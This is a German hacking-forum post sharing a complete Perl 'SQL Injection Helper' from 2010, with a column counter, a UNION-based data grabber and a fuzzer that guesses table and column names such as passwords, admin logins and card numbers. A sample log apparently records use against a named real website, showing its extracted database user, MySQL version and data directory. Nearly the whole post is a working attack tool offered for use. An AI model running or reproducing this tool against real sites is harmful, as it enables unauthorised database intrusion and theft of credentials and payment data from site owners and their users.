Ich stelle euch hier ein schon etwas älteres Projekt von mir zur Verfügung. Da verschiedene SQL Injection Helper bei mir nicht besonders liefen, ganz abgesehen von Linux, habe ich mir selbst was dazu geschrieben.
Etwas besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz :D
Funktionen sind in den Comments zu betrachten.
Bubi ist geschrieben in Perl
Zeilen gesamt -> ähm 310
Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein ;)
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen :)
Intro
Logfile - Example:Zitat:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
Script:Code:+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8--+
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,j0k3
User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_name,99999)))+from+information_schema.columns
Dumping Information:
[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7,j0k3
Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
Code:#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................................
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;
our ($op,$url,$true) = @ARGV;
our ($file,$lim) = ('log.txt',1000);
our $ua = LWP::UserAgent->new();
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
usage() unless $op =~ m:^-d$|^-c$|^-f$:i;
usage() unless $url =~ m.^http://.;
writing($head);
order() if($op eq '-c');
selects() if($op eq '-d');
fuzz() if($op eq '-f');
sub order {
error() if(!$true);
my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
do {
$i++;
$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
} while($resp->content =~ m:$true:i);
$str .= ",$_" for (2..$i-1);
printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
writing("\nColumns:".($i-1)."\nString: $str--+\n\n");
}
sub selects {
if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
my $st = replace($url,'j0k3',$inf);
my $resp = $ua->get("$st--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
print $t; writing($t);
}
elsif($url =~ m:.+from.+:i) {
my ($c,$resp) = (0,0);
$url =~ m:j0k3\((.+)\):i;
my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
my $st = replace($url,'j0k3\('.$1.'\)',$str);
print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
do {
$resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.*):[9]{5}!;
print "[$c] $1\n"; writing("[$c] $1\n");
$c++;
} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
}
else {
error();
}
}
sub fuzz {
my @tables =(
'user','admin','users','admins','account','accounts','adm','admin_login',
'member','memberlist','members','login_admin','login_admins','login_user',
'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
'administrable','administrate','administration','administrator','administrators',
'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin',
'articles','artikel','aut','author','autore','backend','backend_users','backenduser',
'chat_config','chat_messages','chat_users','client','clients','clubconfig',
'company','config','contact','contacts','content', 'control','cpg_config',
'cpg132_users','customer','customers','customers_basket','dbadmins','dealer',
'dealers','diary','download','forum.ibf_members','fusion_user_groups',
'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
'mysql','mysql.user','name','names','news','news_lostpass','newsletter',
'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
'obb_profiles','order','orders','parol','partner','partners','passes','password',
'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers',
'session','sessions','settings','shop.cards','shop.orders','site_login',
'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser',
'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties',
'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre',
'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent',
'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList',
'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info',
'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
'jos_user','table_user','email','mail','bulletin','cc_info','login_name',
'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin',
);
my @columns = (
'user','name','username','password','passwd','pass','benutzername','passwort',
'cc_number','id','email','pwd','user_name','customers_email_address',
'customers_password','user_password','user_pass','admin_user','admin_password',
'admin_pass','usern','user_n','username1','password1','email1','id1',
'users','login','logins','login_user','login_admin','login_username','user_username',
'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
'admin_userid','adminusername','admin_username','adminname','admin_name',
'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria',
'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
'administrator_name','mem_login','login_password','login_pass','login_passwd',
'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password',
'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass',
'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
'my_name','my_password','my_email','cvvnumber','about','access','accnt',
'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
'conf','config','contact','converge_pass_hash','converge_pass_salt','crack',
'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
'db_password','db_username','download','e-mail','emailaddress','full','gid',
'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
'id_member','images','index','ip_address','last_ip','last_login','lastname',
'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member',
'member_id','member_login_key','member_name','memberid','membername','members',
'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort',
'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
'secretquestion','serial','session_member_id','session_member_login_key','sesskey',
'setting','sid','spacer','status','store','store1','store2','store3','store4',
'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm',
'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
'xar_pass');
print "\nUrl: $url\n"; writing("\nUrl: $url\n");
print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
foreach my $tab (@tables) {
my $re = replace($url,'j0k3',9x5);
my $resp = $ua->get("$re+FROM+$tab--+");
if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
print "+ $tab -> Scanning Columns:\n";
writing("+ $tab -> Scanning Columns:\n");
foreach my $col (@columns) {
$re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
print "- $col\n"; writing("- $col\n");
}
}
}
}
}
sub replace {
my ($str,$or,$re) = @_;
$str =~ s/$or/$re/;
return $str;
}
sub writing {
my $text = shift;
open FL,">>$file" or die "\n$!\n";
print FL $text;
close FL;
}
sub error {
print "+-------------------------------------------------------------+\n".
"| Error: Read Usage! - \$ perl sql.pl |\n".
"+-------------------------------------------------------------+\n"; exit;
}
sub usage {
print q {
+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0ke(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $perl sql.pl -f <url> |
| $perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
}; exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0